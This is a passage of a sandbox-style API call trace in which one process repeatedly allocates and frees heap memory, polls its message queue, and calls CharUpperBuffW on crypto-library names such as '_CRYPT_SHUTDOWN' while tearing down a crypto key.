hHeap=0x970000) returned 1 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.661] CryptDestroyKey (hKey=0xa87090) returned 1 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0265.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0265.663] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.663] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0265.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.663] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0265.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.664] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.664] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0265.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0265.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0265.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0265.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0265.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0265.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0265.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.665] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.669] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.669] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0265.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0265.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0265.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0265.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0265.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0265.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0265.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.673] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.673] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.673] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0265.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0265.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0265.674] 